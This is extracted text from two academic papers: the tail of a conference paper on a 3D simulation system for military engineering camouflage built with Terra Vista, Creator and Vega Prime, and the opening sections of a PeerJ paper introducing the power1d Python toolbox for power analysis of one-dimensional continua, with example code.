simulation model and simulation scene. The simulation model refers to all the models in the target area, and the simulation scene refers to the virtual camouflage simulation scene generated in order to achieve the effect of the engineering camouflage simulation. For engineering camouflage simulation system design and development can be divided into the following four steps to complete, and the overall system framework is shown in Figure 1. Terra Vista Creator Camouflage generate system terrain model Culture Data Surface layout Texture material DEM data ortho-photo data ground object model Camouflage pattern Vega Custom code API Real-time operation Real-time application Simulation scene of Engineering camouflage Figure 1. Framework of Simulation system A. Build terrain model Acquire high-precision DEM data and satellite ortho-photo data of a certain region and establish a terrain model of a simulation scene in Terra Vista to construct the altitude and fluctuation of the surface. B. Build ground object model According to the plane layout, texture material and other data of the ground surface around the simulation scene, the 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 127 ground model was constructed by MultiGen Creator, thereby constructing the scene of military equipment, weapons and equipment, and storage camps. C. Camouflage scene model According to the background and target characteristics around the simulation scene, Yu’s[7] camouflage design method was used to obtain the digital camouflage pattern, the camouflage pattern was mapped to the surface of the 3D model, and the disguised model was arranged in the whole scene. D. Rendering and implementation The OpenFlight API is used to programmatically export the layout information of the model, then uses Vega Prime and visual studio to write the real-time scheduling display program, and combines the MFC framework to generate a real-time roaming simulation scenario. III. ESTABLISH AND RENDERING MODEL A. The establishment of terrain model In the field of military camouflage, terrain refers to the natural state of the earth's surface. Whether a target can be detected or not depends on the complexity of the terrain and the difference between target and background[8]. Terrain model is an abstract and simplified expression of real terrain attributes. Therefore, it is inevitably involved in the display and processing of the 3D geospatial scenes in the battlefield environment simulation. The terrain visual simulation has become the hot spot of the 3D scene simulation research in the battlefield environment. Terra Vista is MultiGen's software for modeling complex terrain visual simulations and is used to build 3D terrain simulation models. Terra Vista manages 3D terrain data in a project. It is mainly composed of a terrain data source library, terrain parameter configuration, vector parameter configuration, CDB format terrain file browsing, and a model database. It runs on the Windows platform and generates a terrain database in MataFlight or OpenFlight format that can be used directly on PC workstations or other graphical vision systems. Terra Vista builds a 3D terrain simulation model mainly including three steps: data loading, setting terrain parameters, and calculating & generating terrain. 1) data loading It mainly includes the import of data such as elevation data, satellite image data, and vector data. First, load digital elevation data. Take a certain 60km2 area of America as a camouflage scene. The more accurate the DEM data is, the more realistic the terrain is, and the more detailed local details of the real terrain can be expressed. For simulation scenarios, the accuracy of the terrain grid is generally 10m to 30m. Therefore, Yu[9] proposed an improved bilinear interpolation algorithm to interpolate on the basis of the original DEM data, thereby improving the accuracy of DEM data. 30m accuracy of the original elevation map and Yu's method to 15m accuracy elevation map shown in Figure 2. (a)30m accuracy elevation map (b) 15m accuracy elevation map Figure 2. 30m and 15m accuracy elevation map Second, load satellite image data. Use Bing Maps Satellite to obtain satellite imagery of the area to be camouflaged. The image is a Mercator projection on a SPHERE RADIUS 6378137 benchmark, and the SRTM DEM uses a Geocentric projection of a WGS84 benchmark, So this requires format conversion. Use the Projection Conversion Tool in Global Mapper to convert satellite imagery into the WGS84 benchmark Geocentric projection format. The ortho-photos obtained are shown in Figure 3. Figure 3. Ortho-photos maps Finally, load vector data. The vector data refers to the polygons in the terrain database except terrain. It can be formed naturally, such as lakes and rivers, or it can be constructed artificially, such as buildings and roads. we use satellite image to create vector data for this area by Terra Vista. The main rules are: to create point details for objects with limited area, location, orientation, that do not require a specific shape; to create linear details for objects that length is much larger than the width and height; to create area details for objects that occupy a large area and need to be defined on the edge of the area. 2) Terrain parameter settings It mainly includes the levels of detail (LOD), the visual distance, the size of the grid, and the method of construct grid. Terrain LOD technology is a kind of terrain drawing method, which reduces the geometric complexity of the terrain scene by simplifying the details of the terrain surface step by step without affecting the visual effects of the scene, thereby improving the efficiency of the rendering algorithm. In this paper, the LOD is constructed using a quadtree hierarchy, each layer divides the terrain into several grids, the next layer quarters each grid in the previous layer, and so on. Each layer in the hierarchy Grid is subdivided by a number of triangles. The simulation scene LOD is set to 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 128 three levels, the visual distance is set to 5000m, the terrain block is set to 7500m×7500 m, and Denauley algorithm is used to construct a triangular mesh to generate multi-resolution geometric terrain. AS shown in Figure 4. (a) Terrain model with 582 patches (LOD2) (b) Terrain model with 8496 patches (LOD1) (c) Terrain model with 18,171 patches (LOD0) Figure 4. Terrain model with different resolutions 3) Calculate and generate terrain Use the Gaming Area tool to select the target area to be generated, set the format and resolution of the output texture image, determine the output model format, taking into account the later amendments in the Creator, this article uses OpenFlight format. In the process of generating the terrain model, the generated terrain is stored in the OpenFlight model file in the unit of divided grid. Finally, each model node is unified by an external reference node in the file named master.flt. Figure 5 is shown as the final geometric terrain. Figure 5. Terrain map B. Build ground object model The ground object model is an important part of the battlefield environment, including natural land objects, military equipment, blockhouses, storage barracks and other important battlefield objects. MultiGen Creator is a visual simulation software for creating 3D models. The basic core of the software is the modeling module, which provides a visual environment for creating and editing database files[10]. Different from common modeling tools such as 3DMAX and MAYA, Creator uses a hierarchical structure to describe the simulation scenario. It can conveniently organize the model according to the geometric feature and is suitable for real-time traversal operations[11]. Steps for using Creator modeling are as follows: Step1: Determine model data. For natural objects, information such as location and area is required; For buildings, they need information such as floor plan, section drawing, and three views. Step2: Determine the hierarchical structure of the model. Decompose the model according to the tree structure, such as the floor of the building, the inner wall, etc. Step3: Using Yu's algorithm[7] to generate camouflage pattern, the selected typical background and the generated camouflage pattern are shown in the following page Figure 6. (a) typical background (b) camouflage pattern Figure 6. The generation of camouflage patterns. Step4: Using texture mapping technology to Figure 6.camouflage pattern mapping to the surface of 3D model, through the interactive control module rotating object or change the point of view to get a different perspective, has practical application value of camouflage target 3D view. Finally, the 3D model is placed in the simulation scene according to the corresponding proportion. The ground object model is shown in Figure 7 and Figure 8. Figure 7. Helicopter camouflage model Figure 8. Tank camouflage model C. Rendering and implementation of the model Real-time rendering engine is the core of camouflage simulation scene. Vega Prime, a real-time 3D visual simulation tool developed by MultiGen, is widely used in 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 129 military simulation[12]. VP includes LynX Prime graphical user interface configuration tool and VSG advanced cross-platform scene rendering API[13]. This article calls VP in the environment of MFC library to implement the design of virtual real-time simulation system. The specific method is as follows: Step1: Creates a single thread in the application to run the whole VP program, include initialization, define, configure, and frame cycles. Step2: Adds the member function responsible for opening the thread in the view class of the MFC framework. Step3: Uses the API function AfxBegin Thread to open the VP thread, and continuously refresh the VP visual window in the background program. IV. SIMULATION RESULTS AND ANALYSIS. The developed engineering camouflage scene system based VP technology is shown in Figure 9 The system interface is mainly composed of 4 parts. Among them, part 1 is a subpanel which control to create model, including load OpenFlight formatted data of terrain and ground object model data, generates digital camouflage pattern, and implements the camouflage to terrain and object model in the simulation scene; Part 2 is a configuration subpanel of rendering, including setting the observer, moves mode and atmospheric environment in the simulation, and implements the control of simulation scene, such as translation, scaling, rotation, etc; Part 3 is a simulation control subpanel, and control the beginning and end of the roaming of the whole simulation scene; Part 4 is a display subpanel of simulation scene, show the full face of the scenario. The user can use the PC device to roam freely in the virtual scene. The system will perform real-time rendering and updating according to the position of the movement. The user can view the layout of the simulation scene from different perspectives and positions by switching from a close-range perspective to a distant perspective. Figure 9. Camouflage scene system interface As we have seen from Figure 9, the terrain model and object model established by this system are consistent with the feature of the regional target background. The simulated scene after the disguise has high fidelity and realistic feeling, which is not easy to be detected, which fully reflects the importance of visual simulation in camouflage. V. CONCLUSION In this paper, we have improved the traditional engineering camouflage method through 3D scene simulation technology. we build a framework of VP visual simulation based on MFC, to achieve the target area terrain and object modeling and rendering, establish a 3D, dynamic and high fidelity simulation scene of camouflage. The result shows that, the camouflage simulation scene designed in this paper visually and truly reproduces the effect of camouflage operations in the field, enhances the user's sense of immediacy, and solved the camouflage effect evaluation in current military engineering mainly depends on the field work. It provides an effective auxiliary measure for the evaluation of engineering camouflage effect and provides a good virtual simulation platform for the design of military engineering camouflage, at the same time, this helps to reduce resource consumption for camouflage evaluation. REFERENCES [1] Hu Jianghua. Camouflage technology[M]. Beijing, National Defence Industry Press, 2012: 84-88. [2] Zhang L, Han J Y, Zhang J, et al. Research of Program Development Technology of Vega Prime Based on MFC Framework[J]. Fire Control & Command Control, 2014, 03(39): 159-162. [3] Yao F F, Liang Q, Xu R J, et al. Study of three-dimensional virtual battlefield large terrain dynamically generated based on vega prime[J]. Journal of System Simulation, 2012, 24(9):1900-1904. [4] Zi-Nan H U, Jin-Song Y U. Research of Software Integrated Technology of Vega Prime Based on MFC Programming Framework[J]. Journal of System Simulation, 2009, 21(14):4291-4290. [5] Wu G, Tao J. 3D Modeling of the Relievo Based on the Computer Active Vision[C]// International Conference on Mechatronics, Computer and Education Informationization. 2016. [6] Liu P, Lu Z. Construction and Visualization of 3D Landscape[C]// International Conference on Computer Network, Electronic and Automation. IEEE Computer Society, 2017:28-32. [7] Yu Jun, Shuang Xiao. Design of Imitation Digital Camouflage[J]. Journal of Applied Sciences, 2012, 30(4):331-334. [8] Dong Zhiming, Guo Qisheng. Modeling and simulation of battlefield environment[M]. Beijing, National Defence Industry Press, 2013: 153-157. [9] Yu Jun, Lu Yanxin, Hu Zhiyi, et al. An Improved Bilinear Interpolation of Regular Grid DEM[J]. Journal of Geomatics Science and Technology, 2015, 32(5):521-524. [10] Shao Xiaodong. MultiGen Creator modeling art[M]. Xi`an, Xidian university press, 2014: 40-43. [11] Wang N, Han Y, Chen G. Comparison Analysis of Modeling of Virtual GIS Based on 3DS MAX and MultiGen Creator[J]. Bulletin of Surveying & Mapping, 2010, 62(5):14. [12] Vega Prime Programmer’s Guide(Version 2.0)[Z]. Dallas: MultiGen-Paradigm Inc. 2005: 12-16. [13] Wang Xiaoping. Vega Prime real time 3d virtual reality development technology[M]. Chengdu, Southwest Jiaotong University press, 2012: 128-133. work_yxyq6ahmcjafbdnyyrzgzesjse ---- Submitted 14 April 2017 Accepted 12 June 2017 Published 3 July 2017 Corresponding author Todd C. Pataky, tpataky@shinshu-u.ac.jp Academic editor Robert Winkler Additional Information and Declarations can be found on page 23 DOI 10.7717/peerj-cs.125 Copyright 2017 Pataky Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Power1D: a Python toolbox for numerical power estimates in experiments involving one-dimensional continua Todd C. Pataky Institute for Fiber Engineering, Shinshu University, Ueda, Japan ABSTRACT The unit of experimental measurement in a variety of scientific applications is the one-dimensional (1D) continuum: a dependent variable whose value is measured repeatedly, often at regular intervals, in time or space. A variety of software packages exist for computing continuum-level descriptive statistics and also for conducting continuum-level hypothesis testing, but very few offer power computing capabilities, where ‘power’ is the probability that an experiment will detect a true continuum signal given experimental noise. Moreover, no software package yet exists for arbitrary continuum-level signal/noise modeling. This paper describes a package called power1d which implements (a) two analytical 1D power solutions based on random field theory (RFT) and (b) a high-level framework for computational power analysis using arbitrary continuum-level signal/noise modeling. First power1d’s two RFT-based analytical solutions are numerically validated using its random continuum generators. Second arbitrary signal/noise modeling is demonstrated to show how power1d can be used for flexible modeling well beyond the assumptions of RFT-based analytical solutions. Its computational demands are non-excessive, requiring on the order of only 30 s to execute on standard desktop computers, but with approximate solutions available much more rapidly. Its broad signal/noise modeling capabilities along with relatively rapid computations imply that power1d may be a useful tool for guiding experimentation involving multiple measurements of similar 1D continua, and in particular to ensure that an adequate number of measurements is made to detect assumed continuum signals. Subjects Scientific Computing and Simulation, Programming Languages Keywords Gaussian random fields, Time series, Random field theory, Hypothesis testing, Computational statistics, Data modeling INTRODUCTION Analyzing multiple measurements of one-dimensional (1D) continua is common to a variety of scientific applications ranging from annual temperature fluctuations in climatology (Fig. 1) to position trajectories in robotics. These measurements can be denoted y(q) where y is the dependent variable, q specifies continuum position, usually in space or time, and where the continua are sampled at Q discrete points. For the climate data depicted in Fig. 1 y is temperature, q is day and Q=365. Measurements of y(q) are often: (i) registered and (ii) smooth. The data are ‘registered’ in the sense that point q is homologous across multiple continuum measurements. How to cite this article Pataky (2017), Power1D: a Python toolbox for numerical power estimates in experiments involving one- dimensional continua. PeerJ Comput. Sci. 3:e125; DOI 10.7717/peerj-cs.125 https://peerj.com mailto:tpataky@shinshu-u.ac.jp mailto:tpataky@shinshu-u.ac.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.125 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.125 0 100 200 300 Day 30 20 10 0 10 20 Te m pe ra tu re ( de g C) (A) 0 100 200 300 Day 30 20 10 0 10 20 (B) Arctic Atlantic Continental Pacific Figure 1 Canadian temperature data (Ramsay & Silverman, 2005). (A) All measurements. (B) Means (thick lines) and standard deviations (error clouds). Dataset download on 28 March 2017 from: http:// www.psych.mcgill.ca/misc/fda/downloads/FDAfuns/Matlab/fdaMatlab.zip (./examples/weather) Registration implies that it is generally valid to compute mean and variance continua as estimators of central tendency and dispersion (Friston et al., 1994). That is, at each point q the mean and variance values are computed, and these form mean and variance continua (Fig. 1B) which may be considered unbiased estimators of the true population mean and variance continua. The data are ‘smooth’ in the sense that continuum measurements usually exhibit low frequency signal. This is often a physical consequence of the spatial or temporal process which y(q) represents. For example, the Earth’s rotation is slow enough that day-to-day temperature changes are typically much smaller than season-to-season changes (Fig. 1A). Regardless of the physical principles underlying the smoothness, basic information theory in fact requires smooth continua because sufficiently high measurement frequency is needed to avoid signal aliasing. This smoothness has important statistical implications because smoothness means that neighboring points (q and q+1) are correlated, or equivalently that adjacent points do not vary in a completely independent way. Thus, even when Q separate values are measured to characterize a single continuum, there may be far fewer than Q independent stochastic units underlying that continuum process. The Canadian temperature dataset in Fig. 1 exhibits both features. The data are naturally registered because each measurement station has one measurement per day over Q=365 days. The data are smooth because, despite relatively high-frequency day-to-day temperature changes, there are also comparatively low-frequency changes over the full year and those low-frequency changes are presumably the signals of interest. Having computed mean and variance continua it is natural to ask probabilistic questions regarding them, and two basic kinds of probability questions belong to the categories: (i) classical hypothesis testing and (ii) power analysis. Continuum-level hypothesis testing has been well-documented in the literature (Friston et al., 1994; Nichols & Holmes, 2002; Pataky, 2016) but power has received comparatively less attention. While this paper focuses on power analysis it is instructive to first consider continuum-level hypothesis testing because those results are what power analysis attempts to control. Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 2/24 https://peerj.com http://www.psych.mcgill.ca/misc/fda/downloads/FDAfuns/Matlab/fdaMatlab.zip http://www.psych.mcgill.ca/misc/fda/downloads/FDAfuns/Matlab/fdaMatlab.zip http://dx.doi.org/10.7717/peerj-cs.125 0 100 200 300 Day 0 1 2 3 4 5 6 7 t v al ue Test statistic continuum Bonferroni threshold ( =0.05) RFT threshold ( =0.05) Uncorrected threshold ( =0.05) Figure 2 Two-sample hypothesis test comparing the Atlantic and Continental regions from Fig. 1. The test statistic continuum is depicted along with uncorrected, random field theory (RFT)-corrected and Bonferroni-corrected thresholds. Continuum-level hypothesis testing Classical hypothesis testing can be conducted at the continuum level using a variety of theoretical and computational procedures. In the context of the temperature data (Fig. 1B) a natural hypothesis testing question is: is there is a statistically significant difference between the Atlantic and Continental mean temperature continua? Answering that question requires a theoretical or computational model of stochastic continuum behavior so that probabilities pertaining to particular continuum differences can be calculated. One approach is Functional Data Analysis (FDA) (Ramsay & Silverman, 2005) which combines ‘basis functions’, or mathematically-defined continua, to model the data. Since the basis functions are analytical, one can compute a variety of probabilities associated with their long-term stochastic behavior. A second approach is Random Field Theory (RFT) (Adler & Hasofer, 1976; Hasofer, 1978) which extends Gaussian behavior to the 1D continuum level via a smoothness parameter (Kiebel et al., 1999) from which a variety of continuum level probabilities can be calculated (Friston et al., 1994). A third approach is the non-parametric permutation method of Nichols & Holmes (2002) which, instead of modeling stochastic continuum behavior directly, instead constructs probability distributions through iterative computation. Ultimately these and all other approaches, when used for classical hypothesis testing, offer a correction for multiple comparisons across the Q continuum nodes based on continuum smoothness. Example hypothesis testing results for the Canadian temperature data are depicted in Fig. 2. Since there are mean and variance continua it is trivial to compute the test statistic continuum, here as the two-sample t statistic representing the variance-normalized Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 3/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 difference between the Atlantic and Continental regions. The next step is less trivial: finding the critical test statistic threshold. The threshold is meant to represent the value above which purely random test statistic continua (i.e., those produced by random continua when the true continuum difference is null) would traverse in α percent of an infinite number of experiments, where α is the Type I error rate and is usually 0.05. Of the three thresholds depicted in Fig. 2 only one (the RFT threshold) is a true continuum-level threshold. The other two depict nappropriate thresholds as references to highlight the meaning of the RFT threshold. In particular, the uncorrected threshold (α=0.05) is ‘uncorrected’ because it presumes Q=1; since Q=365 for these data it is clearly inappropriate. On the other extreme is a Bonferroni threshold which assumes that there are Q completely independent processes. It is a ‘corrected’ threshold because it acknowledges that Q>1, but it is inappropriate because it fails to account for continuum smoothness, and thus overestimates the true number of stochastic processes underlying these data. The third method (RFT) is also a ‘corrected’ threshold, and it is closest to the true threshold required to control α because it considers both Q and smoothness Friston et al. (1994). Specifically, it assesses inter-node correlation using the 1D derivative (Kiebel et al., 1999) to lower the estimated number of independent processes, which in turn lowers the critical threshold relative to the Bonferroni threshold. This RFT approach is described extensively elsewhere Friston et al. (2007) and has also been validated extensively for 1D continua (Pataky, 2016). For this particular dataset the test statistic continuum crosses all three thresholds, implying that the null hypothesis of equivalent mean continua is rejected regardless of correction procedure. If the continuum differences are not as pronounced as they are here, especially near the start and end of the calendar year, the correction procedure would become more relevant to interpretation objectivity. Continuum-level power analysis Before conducting an experiment for which one intends to conduct classical hypothesis testing it is often useful to conduct power analysis, where ‘power’ represents the probability of detecting a true effect. The main purposes of power analysis are (a) to ensure that an adequate number of measurements is made to elucidate a signal of empirical interest and (b) to ensure that not too many measurements are made, in which case one risks detecting signals that are not of empirical interest. The balance point between (a) and (b) is conventionally set at a power of 0.8, and that convention is followed below. The literature describes two main analytical approaches to continuum-level power analysis: (i) inflated variance (Friston et al., 1996) and (ii) noncentral RFT (Hayasaka et al., 2007; Mumford & Nichols, 2008; Joyce & Hayasaka, 2012). The inflated variance method models signal as smooth Gaussian noise (Fig. 3A) which is superimposed upon Gaussian noise with different amplitude and smoothness. The non-central RFT approach models signal as a constant mean shift from the null continuum (Fig. 3B). Since both techniques are analytical power calculations can be made effectively instantaneously. However, both techniques are limited by simple signal models and relatively simple noise models. In reality Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 4/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0 25 50 75 100 Continuum position (%) 4 2 0 2 4 D ep en de nt v ar ia bl e (a) Inflated variance Noise Signal 0 25 50 75 100 Continuum position (%) (b) Non-central RFT 0 25 50 75 100 Continuum position (%) (c) Numerical Figure 3 Continuum-level power analysis methods. (A) Friston et al. (1996). (B) Hayasaka et al. (2007) and Mumford & Nichols (2008). (C) This paper’s proposed computational method. RFT= random field theory. the signal can be geometrically arbitrary and the noise can be arbitrarily complex (Fig. 3C). Currently no analytical methods exist for arbitrary signal geometries and arbitrary noise. The purpose of this study was to develop a computational approach to continuum-level power analysis that permits arbitrary signal and noise modeling. This paper introduces the resulting open-source Python software package called power1d, describes its core computational components, and cross-validates its ultimate power results with results from the two existing analytical methods (inflated variance and non-central RFT). Source code, HTML documentation and scripts replicating all results in this manuscript are available at http://www.spm1d.org/power1d. SOFTWARE IMPLEMENTATION power1d was developed in Python 3.6 (Van Rossum, 2014) using Anaconda 4.4 (Continuum Analytics, 2017) and is also compatible with Python 2.7. Its dependencies include Python’s standard numerical, scientific and plotting packages: • NumPy 1.11 (Van der Walt, Colbert & Varoquaux, 2011). • SciPy 0.19 (Jones, Oliphant & Peterson, 2001). • matplotlib 2.0 (Hunter, 2007). Other versions of these dependencies are likely compatible but have not been tested thoroughly. The package is organized into the following modules: • power1d.geom—1D geometric primitives for data modeling. • power1d.models—high-level interfaces to experiment modeling and numerical simulation. • power1d.noise—1D noise classes including mixtures, signal-dependent and compound classes. • power1d.prob—analytical probabilities for central and noncentral t and F fields. • power1d.random—smooth 1D Gaussian field generation. • power1d.roi—regions-of-interest (ROIs) for geometric hypothesis constraints. • power1d.stats—standard t and F computations for continua. Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 5/24 https://peerj.com http://www.spm1d.org/power1d http://dx.doi.org/10.7717/peerj-cs.125 Details regarding the contents and capabilities of each module are provided in power1d’s documentation (http://www.spm1d.org/power1d) and are summarized below, building to a model and ultimately a power analysis of the Canadian temperature dataset above (Fig. 1). Geometry (power1d.geom) Basic geometries can be constructed and visualized as follows: import power1d Q = 101 y = power1d.geom.GaussianPulse( Q , q=60 , fwhm=20, amp=3.2 ) y.plot() Here Q is the continuum size, q is the continuum position at which the Gaussian pulse is centered, fwhm is the full-width-at-half-maximum of the Gaussian kernel, and amp is its maximum value (Fig. 4). All of power1d’s geometric primitives have a similar interface and are depicted in Fig. 5. More complex geometries can be constructed using standard Python operators as follows (see Fig. 6). import power1d Q = 101 y0 = power1d.geom.GaussianPulse( Q , q=40 , fwhm=60, amp= 1 ) y1 = power1d.geom.Sinusoid( Q , amp=1 , hz=2 ) yA = y0 + y1 yB = y0 * y1 yC = y0 ** y1 Noise (power1d.noise) Continuum-level noise objects can be constructed and visualized as follows: from matplotlib import pyplot import power1d J = 8 Q = 101 n0 = power1d.noise.Gaussian( J , Q , mu=0 , sigma=1 ) n1 = power1d.noise.SmoothGaussian( J , Q , mu=0 , sigma=1 , fwhm=20 ) ax0 = pyplot.subplot( 121 ) ax1 = pyplot.subplot( 122 ) n0.plot( ax=ax0 ) n1.plot( ax=ax1 ) Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 6/24 https://peerj.com http://www.spm1d.org/power1d http://dx.doi.org/10.7717/peerj-cs.125 0 20 40 60 80 100 Continuum position 0.0 0.5 1.0 1.5 2.0 2.5 3.0 Co nt in uu m v al ue Figure 4 Example GaussianPulse geometry. Here J is sample size and is a necessary input for all power1d.noise classes. This code chunk results in the noise depicted in Fig. 7. The SmoothGaussian noise (Fig. 7B) represents residuals observed in real datasets like those depicted implicitly in Fig. 1A. For this SmoothGaussian noise model the fwhm parameter represents the full-width-at-half- maximum of a Gaussian kernel that is convolved with uncorrelated Gaussian continua. RFT describes probabilities associated with smooth Gaussian continua (Fig. 7B) and in particular the survival functions for test statistic continua (Friston et al., 1996; Pataky, 2016). All power1d noise models are depicted in Fig. 8. Compound noise types are supported including additive, mixture, scaled and signal-dependent. As an example, the additive noise model depicted in Fig. 8H can be constructed as follows: n0 = power1d.noise.Gaussian( J , Q , mu=0 , sigma=0.1 ) n1 = power1d.noise.SmoothGaussian( J , Q , mu=0 , sigma=1.5 , fwhm=40 ) n = power1d.noise.Additive ( noise0 , noise1 ) All noise models use the random method to generate new random continua, and all store the current continuum noise in the value attribute, and all number generation can be controlled using NumPy’s random.seed method as follows: np.random.seed(0) J = 10 Q = 101 noise = power1d.noise.Gaussian ( J , Q , mu=0 , sigma=1 ) print( noise.value[ 0 , 0:3 ] ) Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 7/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0 50 100 2 0 2 4 Co nt in uu m v al ue (A) Continuum1D 0 50 100 2 0 2 4 (B) Constant 0 50 100 2 0 2 4 (C) Exponential 0 50 100 2 0 2 4 (D) ExponentialSaw 0 50 100 2 0 2 4 (E) GaussianPulse 0 50 100 2 0 2 4 Co nt in uu m v al ue (F) Linear 0 50 100 2 0 2 4 (G) Null 0 50 100 2 0 2 4 (H) SawPulse 0 50 100 2 0 2 4 (I) SawTooth 0 50 100 2 0 2 4 (J) Sigmoid 0 50 100 Continuum position 2 0 2 4 Co nt in uu m v al ue (K) Sinusoid 0 50 100 Continuum position 2 0 2 4 (L) SquarePulse 0 50 100 Continuum position 2 0 2 4 (M) SquareTooth 0 50 100 Continuum position 2 0 2 4 (N) TrianglePulse 0 50 100 Continuum position 2 0 2 4 (O) TriangleTooth Figure 5 All geometric primitives. The Continuum1D primitive accepts an arbitrary 1D array as input, and all other primitives are parameterized. (A) Continuum1D, (B) Constant, (C) Exponential, (D) ExponentialSaw, (E) GaussianPulse, (F) Linear, (G) Null, (H) SawPulse, (I) SawTooth, (J) Sigmoid, (K) Sinusoid, (L) SquarePulse, (M) SquareTooth, (N) TrianglePulse, (O) TriangleTooth. 0 20 40 60 80 100 Continuum position 1.0 0.5 0.0 0.5 1.0 Co nt in uu m v al ue (A) y0 y1 0 20 40 60 80 100 Continuum position 1 0 1 2 3 4 5 6 (B) yA = y0 + y1 yB = y0 * y1 yC = y0 ** y1 Figure 6 (A) Two example geometric primitives. (B) Python operators used to construct complex ge- ometries from primitives. noise.random() print( noise.value[ 0 , 0:3 ] ) np.random.seed(0) noise.random( ) print( noise.value [ 0 , 0:3 ] ) Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 8/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0 20 40 60 80 100 Continuum position 3 2 1 0 1 2 3 Co nt in uu m v al ue (A) 0 20 40 60 80 100 Continuum position 3 2 1 0 1 2 3 (B) Figure 7 (A) Uncorrelated Gaussian noise. (B) Smooth (correlated) Gaussian noise. 0 50 100 2 0 2 4 Co nt in uu m v al ue (A) ConstantUniform 0 50 100 2 0 2 4 (B) ConstantGaussian 0 50 100 2 0 2 4 (C) Uniform 0 50 100 2 0 2 4 (D) Gaussian 0 50 100 2 0 2 4 (E) Skewed 0 50 100 2 0 2 4 Co nt in uu m v al ue (F) SmoothGaussian 0 50 100 2 0 2 4 (G) SmoothSkewed 0 50 100 Continuum position 2 0 2 4 Co nt in uu m v al ue (H) Additive 0 50 100 Continuum position 2 0 2 4 (I) Mixture 0 50 100 Continuum position 2 0 2 4 (J) Scaled 0 50 100 Continuum position 2 0 2 4 (K) SignalDependent Figure 8 All noise models. (A–E), (F–G) and (H–K) depict basic, smooth and compound noise types, respectively. The first, second and third print commands display the following results: [ 0.176 0.040 0.098 ] [ -0.100 0.167 0.016 ] [ 0.176 0.040 0.098 ] This emphasizes control over power1d’s random values via np.random.seed. Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 9/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0 20 40 60 80 100 Continuum position 2 0 2 4 6 8 Co nt in uu m v al ue (A) Noise Mean 0 20 40 60 80 100 Continuum position 2 0 2 4 6 8 (B) Figure 9 Data sample model. (A) and (B) depict two separate samples generated using a single DataSam- ple object. Data sample and experiment models (power1d.models) In this section the terms ‘‘DataSample’’ and ‘‘data sample’’ refer to the object class: power1d.models.DataSample and a numerical instantiation of that class, respectively. DataSample objects have three components: (a) baseline, (b) signal and (c) noise. The first two are power1d.geom objects and the last is a power1d.noise object. DataSample objects, like noise objects, use random to generate new random data samples as follows: J = 8 Q = 101 baseline = power1d.geom.Null( Q ) signal = power1d.geom.GaussianPulse( Q , q=60 , fwhm=30, amp=8 ) noise = power1d.noise.SmoothGaussian( J , Q , mu=0 , sigma=1 , fwhm=20 ) model = power1d.models.DataSample( baseline , signal , noise ) model.plot() model.random() model.plot() Two such data samples constructed in this manner are depicted in Fig. 9. Any geometry object and any noise object can be combined to form a DataSample object. The purpose of the baseline object is to provide a visual reference when constructing DataSample models. For example, the Atlantic temperature data from Fig. 1A could be modeled with the experimentally observed mean as follows: data = power1d.data.weather() y = data[ " Continental " ] J = 8 Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 10/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 0 100 200 300 Continuum position 30 20 10 0 10 20 Co nt in uu m v al ue (A) Noise Mean 0 100 200 300 Continuum position 20 10 0 10 20 (B) Figure 10 Data sample model using experiment mean from the Continental data in Fig. 1. (A) and (B) depict two separate randomly generated samples. Q = 365 baseline = power1d.geom.Continuum1D( y.mean( axis=0 ) ) signal = power1d.geom.Null( Q ) n0 = power1d.noise.Gaussian( J , Q , mu=0 , sigma=0.3 ) n1 = power1d.noise.SmoothGaussian( J , Q , mu=0 , sigma=3 , fwhm=70 ) noise = power1d.noise.Additive( n0 , n1 ) model=power1d.models.DataSample( baseline , signal , noise , J=J ) model.plot() model.random() model.plot() The first command loads the Canadian temperature (or ‘weather’) data as a Python dictionary. The second extracts just the Continental data. Next the experimental mean is used to create a Continuum1D baseline object, and a Null signal object is also created. The next three lines create an additive noise model which contains both high- and low- frequencies. Subsequently a DataSample model is created with the sample size J. The results of this code chunk are depicted in Fig. 10. The baseline component of DataSample objects have no effect on subsequently described power calculations, which are based on the signal and noise components. The baseline component is included for two reasons: (a) to visually guide DataSample construction, and (b) to permit hypothesis-relevant calculations. For example, one’s hypothesis may pertain to a function of the continua like their cumulative integral rather than to the originally measured continua themselves. In that case the baseline’s magnitude as well as its positive and negative regions could be important for test statistic computation. Pataky (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.125 11/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.125 Once a data sample model is constructed it can be routed into an Experiment model for simulation as follows: J = 8 Q = 101 baseline = power1d.geom.Null( Q ) signal = power1d.geom.GaussianPulse( Q , q=60 , fwhm=30, amp=3 ) noise = power1d.noise.SmoothGaussian( J , Q , mu=0 , sigma=1 , fwhm=20 ) model = power1d.models.DataSample( baseline , signal , noise , J=J ) teststat = power1d.stats.t_1sample emodel = power1d.models.Experiment( model , teststat ) emodel.simulate( 50 ) pyplot.plot( emodel.Z.T , color="k" , linewidth=0.5 ) Here teststat is a function that computes the one-sample t statistic continuum. The Experiment model contains both a DataSample model and a test statistic computer. Once the simulate method is called, a random data sample is generated and the corresponding test statistic continuum is calculated and stored in the Z attribute, in this case for a total of 50 iterations. The resulting test statistic continua are depicted in Fig. 11. 